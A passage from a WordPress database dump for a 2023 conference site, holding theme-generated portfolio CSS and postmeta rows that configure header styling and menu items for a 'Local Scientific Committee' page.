a,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .paginator a * {\r\n  color: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .filter-bg-decoration .filter-categories a.act {\r\n  color: #fff;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article {\r\n  margin-top: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article:first-of-type,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.mode-masonry) article.visible.first {\r\n  margin-top: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article {\r\n  margin-top: 0;\r\n  padding-top: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article:first-of-type,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on:not(.mode-masonry) article.visible.first {\r\n  margin-top: 0;\r\n  padding-top: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.hover-scale article:after {\r\n  background: ;\r\n  background: -webkit-linear-gradient();\r\n  background: linear-gradient();\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\r\n  border-radius: 0px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap {\r\n  padding: 20px 20px 0px 20px;\r\n  border-radius: 0px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap *,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-rollover:after {\r\n  border-radius: 0px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.enable-bg-rollover .post-thumbnail-rollover:after {\r\n  background: ;\r\n  background: -webkit-linear-gradient();\r\n  background: linear-gradient();\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.gradient-overlay-layout-list) .post-thumbnail {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.gradient-overlay-layout-list) .post-thumbnail {\r\n  box-shadow: \"\";\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list article {\r\n  box-shadow: \"\";\r\n}\r\n.bottom-overlap-layout-list.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container {\r\n  height: calc(100% - 100px);\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a {\r\n  width: 44px;\r\n  height: 44px;\r\n  line-height: 44px;\r\n  border-radius: 100px;\r\n  margin: 10px 5px 10px;\r\n}\r\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a,\r\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a {\r\n  margin: 10px 10px 10px 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:before,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:after {\r\n  border-width: 0px;\r\n}\r\n.dt-icon-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:before {\r\n  background: rgba(255,255,255,0.3);\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.dt-icon-hover-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:after {\r\n  background: rgba(255,255,255,0.5);\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a > span:before {\r\n  font-size: 16px;\r\n  line-height: 44px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:not(:hover) > span {\r\n  color: #ffffff;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:hover > span {\r\n  color: #ffffff;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-title,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.owl-carousel .entry-title {\r\n  margin-bottom: 5px;\r\n  font-size: 22px;\r\n  line-height: 32px;\r\n  font-style: ;\r\n  font-weight: bold;\r\n  text-transform: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta {\r\n  margin-bottom: 15px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta * {\r\n  font-style: ;\r\n  font-weight: ;\r\n  text-transform: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .portfolio-categories {\r\n  margin-bottom: 15px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-excerpt {\r\n  margin-bottom: 5px;\r\n  font-style: ;\r\n  font-weight: ;\r\n  text-transform: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.centered-layout-list) .post-entry-content {\r\n  padding: 20px 30px 30px 30px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\r\n  padding: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\r\n  background: #f7f7f7;\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-content {\r\n  border-radius: 0px;\r\n}\r\n@media screen and (max-width: ) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 article {\r\n    -webkit-flex-flow: column nowrap;\r\n    -moz-flex-flow: column nowrap;\r\n    -ms-flex-flow: column nowrap;\r\n    flex-flow: column nowrap;\r\n    margin-top: 20px;\r\n  }\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on article {\r\n    border: none;\r\n  }\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.centered-layout-list article {\r\n    padding: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap,\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content {\r\n    width: 100%;\r\n    margin: 0;\r\n    top: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap {\r\n    padding: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content:after {\r\n    display: none;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-even .post-thumbnail-wrap,\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-thumbnail-wrap {\r\n    -webkit-order: 0;\r\n    -moz-order: 0;\r\n    -ms-flex-order: 0;\r\n    order: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-entry-title-content {\r\n    -webkit-order: 1;\r\n    -moz-order: 1;\r\n    -ms-flex-order: 1;\r\n    order: 1;\r\n    width: 100%;\r\n    padding: 20px 20px 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-entry-content {\r\n    -webkit-order: 2;\r\n    -moz-order: 2;\r\n    -ms-flex-order: 2;\r\n    order: 2;\r\n    padding-top: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content {\r\n    padding: 20px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-title {\r\n    margin: 3px 0 5px;\r\n    font-size: 20px;\r\n    line-height: 26px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta {\r\n    margin: 5px 0 5px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-excerpt {\r\n    margin: 15px 0 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-details {\r\n    margin: 5px 0 10px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-details.details-type-link {\r\n    margin-bottom: 2px;\r\n  }\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid {\r\n  grid-row-gap: 30px;\r\n  grid-column-gap: 30px;\r\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .double-width {\r\n  grid-column: span 2;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid,\r\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid {\r\n  display: flex;\r\n  flex-flow: row wrap;\r\n  margin: -15px;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\r\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\r\n  flex: 1 0 ;\r\n  min-width: ;\r\n  max-width: 100%;\r\n  padding: 15px;\r\n  box-sizing: border-box;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n  grid-template-columns: repeat(3,1fr);\r\n  grid-template-rows: auto;\r\n  grid-column-gap: 30px;\r\n  grid-row-gap: 30px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .double-width {\r\n  grid-column: span 2;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n  margin: -15px;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n  width: 33.333333333333%;\r\n  padding: 15px;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n  width: calc(33.333333333333%) * 2;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\r\n  grid-row-gap: 0px;\r\n}\r\n@media screen and (max-width: 1199px) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(3,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 33.333333333333%;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n    width: calc(33.333333333333%)*2;\r\n  }\r\n}\r\n@media screen and (max-width: 991px) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(2,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 50%;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n    width: calc(50%)*2;\r\n  }\r\n}\r\n@media screen and (max-width: 767px) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(1,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 100%;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n    width: calc(100%)*2;\r\n  }\r\n}\r\n'),
(24075,3554,'_the7_imported_item','software-company'),
(24076,3554,'_dt_microsite_primary_menu','5'),
(24077,3554,'_dt_microsite_split_left_menu','5'),
(24078,3554,'_dt_microsite_split_right_menu','5'),
(24079,3554,'_dt_microsite_mobile_menu','5'),
(24080,3554,'_dt_page_overrides_right_margin',''),
(24081,3554,'_dt_page_overrides_left_margin',''),
(24082,3554,'_dt_mobile_page_padding_top',''),
(24083,3554,'_dt_mobile_page_padding_right',''),
(24084,3554,'_dt_mobile_page_padding_bottom',''),
(24085,3554,'_dt_mobile_page_padding_left',''),
(24086,3554,'_thumbnail_id','3299'),
(24087,3554,'_dt_fancy_header_layout_heading',''),
(24088,3554,'_dt_fancy_header_title_aligment','center'),
(24089,3554,'_dt_fancy_header_height','300'),
(24090,3554,'_dt_fancy_header_padding-top','0px'),
(24091,3554,'_dt_fancy_header_padding-bottom','0px'),
(24092,3554,'_dt_fancy_header_breadcrumbs_heading',''),
(24093,3554,'_dt_fancy_header_breadcrumbs','disabled'),
(24094,3554,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(24095,3554,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(24096,3554,'_dt_fancy_header_title_heading',''),
(24097,3554,'_dt_fancy_header_title_mode','custom'),
(24098,3554,'_dt_fancy_header_title','Local Scientific Committee'),
(24099,3554,'_dt_fancy_header_title_font_size','50'),
(24100,3554,'_dt_fancy_header_title_line_height','36'),
(24101,3554,'_dt_fancy_header_text_transform','uppercase'),
(24102,3554,'_dt_fancy_header_title_color_mode','color'),
(24103,3554,'_dt_fancy_header_title_color','#ffffff'),
(24104,3554,'_dt_fancy_header_subtitle_heading',''),
(24105,3554,'_dt_fancy_header_subtitle',''),
(24106,3554,'_dt_fancy_header_subtitle_font_size','18'),
(24107,3554,'_dt_fancy_header_subtitle_line_height','26'),
(24108,3554,'_dt_fancy_header_subtitle_text_transform','none'),
(24109,3554,'_dt_fancy_header_subtitle_color_mode','color'),
(24110,3554,'_dt_fancy_header_subtitle_color','#ffffff'),
(24111,3554,'_dt_fancy_header_bg_heading',''),
(24112,3554,'_dt_fancy_header_bg_color','#222222'),
(24113,3554,'_dt_fancy_header_bg_image_origin','featured_image'),
(24114,3554,'_dt_fancy_header_bg_image','a:0:{}'),
(24115,3554,'_dt_fancy_header_bg_repeat','no-repeat'),
(24116,3554,'_dt_fancy_header_bg_position_x','center'),
(24117,3554,'_dt_fancy_header_bg_position_y','center'),
(24118,3554,'_dt_fancy_header_bg_fullscreen','1'),
(24119,3554,'_dt_fancy_header_bg_overlay','0'),
(24120,3554,'_dt_fancy_header_overlay_color','#000'),
(24121,3554,'_dt_fancy_header_bg_overlay_opacity','50'),
(24122,3554,'_dt_fancy_header_scroll_effect','default'),
(24123,3554,'_dt_fancy_header_bg_parallax','0.5'),
(24124,3554,'_dt_fancy_header_responsiveness_heading',''),
(24125,3554,'_dt_fancy_header_responsiveness','enabled'),
(24126,3554,'_dt_fancy_header_responsiveness_switch','778px'),
(24127,3554,'_dt_fancy_header_responsive_height','70'),
(24128,3554,'_dt_fancy_header_responsive_font_size','30'),
(24129,3554,'_dt_fancy_header_responsive_title_line_height','38'),
(24130,3554,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(24131,3554,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(24132,3554,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(24133,3554,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/11/pexels-nicole-avagliano-2706654-scaled.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 50px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: uppercase;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(24135,3554,'_dp_original','2876'),
(24136,3554,'_edit_last','1'),
(24138,3554,'_edit_lock','1675495154:1'),
(24139,3556,'_wpb_vc_js_status','true'),
(24140,3556,'_dt_sidebar_position','disabled'),
(24141,3556,'_dt_sidebar_widgetarea_id','sidebar_1'),
(24142,3556,'_dt_sidebar_hide_on_mobile','0'),
(24143,3556,'_dt_footer_show','0'),
(24144,3556,'_dt_footer_widgetarea_id','sidebar_2'),
(24145,3556,'_dt_footer_hide_on_mobile','0'),
(24146,3556,'_dt_header_title','fancy'),
(24147,3556,'_dt_header_background','normal'),
(24148,3556,'_dt_header_background_below_slideshow','disabled'),
(24149,3556,'_dt_header_transparent_bg_color_scheme','light'),
(24150,3556,'_dt_header_transparent_top_bar_bg_color',''),
(24151,3556,'_dt_header_transparent_top_bar_bg_opacity','0'),
(24152,3556,'_dt_header_transparent_bg_color','#000000'),
(24153,3556,'_dt_header_transparent_bg_opacity','50'),
(24154,3556,'_dt_header_disabled_background','normal'),
(24155,3556,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(24156,3556,'_dt_header_disabled_transparent_top_bar_bg_color',''),
(24157,3556,'_dt_header_disabled_transparent_top_bar_bg_opacity','0'),
(24158,3556,'_dt_header_disabled_transparent_bg_color','#000000'),
(24159,3556,'_dt_header_disabled_transparent_bg_opacity','50'),
(24160,3556,'_dt_page_overrides_top_margin',''),
(24161,3556,'_dt_page_overrides_right_margin',''),
(24162,3556,'_dt_page_overrides_bottom_margin',''),
(24163,3556,'_dt_page_overrides_left_margin',''),
(24164,3556,'_dt_mobile_page_padding_top',''),
(24165,3556,'_dt_mobile_page_padding_right',''),
(24166,3556,'_dt_mobile_page_padding_bottom',''),
(24167,3556,'_dt_mobile_page_padding_left',''),
(24168,3556,'_dt_fancy_header_layout_heading',''),
(24169,3556,'_dt_fancy_header_title_aligment','center'),
(24170,3556,'_dt_fancy_header_height','300'),
(24171,3556,'_dt_fancy_header_padding-top','0px'),
(24172,3556,'_dt_fancy_header_padding-bottom','0px'),
(24173,3556,'_dt_fancy_header_breadcrumbs_heading',''),
(24174,3556,'_dt_fancy_header_breadcrumbs','disabled'),
(24175,3556,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(24176,3556,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(24177,3556,'_dt_fancy_header_title_heading',''),
(24178,3556,'_dt_fancy_header_title_mode','custom'),
(24179,3556,'_dt_fancy_header_title','Local Science Committee'),
(24180,3556,'_dt_fancy_header_title_font_size','30'),
(24181,3556,'_dt_fancy_header_title_line_height','36'),
(24182,3556,'_dt_fancy_header_text_transform','none'),
(24183,3556,'_dt_fancy_header_title_color_mode','color'),
(24184,3556,'_dt_fancy_header_title_color','#ffffff'),
(24185,3556,'_dt_fancy_header_subtitle_heading',''),
(24186,3556,'_dt_fancy_header_subtitle',''),
(24187,3556,'_dt_fancy_header_subtitle_font_size','18'),
(24188,3556,'_dt_fancy_header_subtitle_line_height','26'),
(24189,3556,'_dt_fancy_header_subtitle_text_transform','none'),
(24190,3556,'_dt_fancy_header_subtitle_color_mode','color'),
(24191,3556,'_dt_fancy_header_subtitle_color','#ffffff'),
(24192,3556,'_dt_fancy_header_bg_heading',''),
(24193,3556,'_dt_fancy_header_bg_color','#222222'),
(24194,3556,'_dt_fancy_header_bg_image_origin','featured_image'),
(24195,3556,'_dt_fancy_header_bg_image','a:0:{}'),
(24196,3556,'_dt_fancy_header_bg_repeat','no-repeat'),
(24197,3556,'_dt_fancy_header_bg_position_x','center'),
(24198,3556,'_dt_fancy_header_bg_position_y','center'),
(24199,3556,'_dt_fancy_header_bg_fullscreen','1'),
(24200,3556,'_dt_fancy_header_bg_overlay','0'),
(24201,3556,'_dt_fancy_header_overlay_color','#000'),
(24202,3556,'_dt_fancy_header_bg_overlay_opacity','50'),
(24203,3556,'_dt_fancy_header_scroll_effect','default'),
(24204,3556,'_dt_fancy_header_bg_parallax','0.5'),
(24205,3556,'_dt_fancy_header_responsiveness_heading',''),
(24206,3556,'_dt_fancy_header_responsiveness','enabled'),
(24207,3556,'_dt_fancy_header_responsiveness_switch','778px'),
(24208,3556,'_dt_fancy_header_responsive_height','70'),
(24209,3556,'_dt_fancy_header_responsive_font_size','30'),
(24210,3556,'_dt_fancy_header_responsive_title_line_height','38'),
(24211,3556,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(24212,3556,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(24213,3556,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(24214,3556,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(24215,3556,'_menu_item_type','post_type'),
(24216,3556,'_menu_item_menu_item_parent','2351'),
(24217,3556,'_menu_item_object_id','3554'),
(24218,3556,'_menu_item_object','page'),
(24219,3556,'_menu_item_target',''),
(24220,3556,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(24221,3556,'_menu_item_xfn',''),
(24222,3556,'_menu_item_url',''),
(24223,3559,'_edit_lock','1680420325:1'),
(24224,3560,'_wp_attached_file','2023/01/loc1.jpg'),
